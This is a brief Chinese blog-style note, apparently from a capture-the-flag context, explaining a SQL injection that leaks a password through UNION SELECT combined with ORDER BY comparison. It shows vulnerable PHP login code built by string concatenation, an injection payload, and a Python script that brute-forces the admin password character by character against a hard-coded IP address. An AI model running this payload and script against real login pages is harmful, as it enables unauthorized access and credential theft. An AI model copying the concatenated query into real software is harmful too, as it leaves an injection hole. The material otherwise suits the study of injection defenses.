一个朋友的博客
https://yang1k.github.io/2018/02/26/sql%E6%B3%A8%E5%85%A5%E4%B9%8Border%20by%E6%B3%A8%E5%85%A5/
原理
https://p0sec.net/index.php/archives/106/
后台代码大概如下:1
2
3
4
5
6
7
8
9
10
11
12
13$sql = 'select * from admin where username='".$username."'';
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if(isset($row)&&row['username']!="admin"){
$hit="username error!";
}else{
if ($row['password'] === $password){
$hit="";
}else{
$hit="password error!";
}
}
payload:1
username=admin' union 1,2,'字符串' order by 3
1 | select * from admin where username='admin' or 1 union select 1,2,binary '字符串' order by 3; |
binary是考虑到大小写的问题,因为order by比较的时候不区分大小写。
exp:(一个例子仅供参考)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16import requests
payload = '0123456789abcdefghijklmnopqrstuvwxyz'
url = 'http://115.159.205.137:8001/'
test1 = ''
for a in range(1,50):
for test2 in payload:
data ={'username':"admin\' or 1 union select 1,2,\'%s%s\' order by 3#"%(test1,test2),'password':'sd'}
r = requests.post(url,data=data)
if 'admin' in r.text:
if 'a' in test2:
test1 += '9'
test1 += chr(ord(test2)-1)
print (test1)
break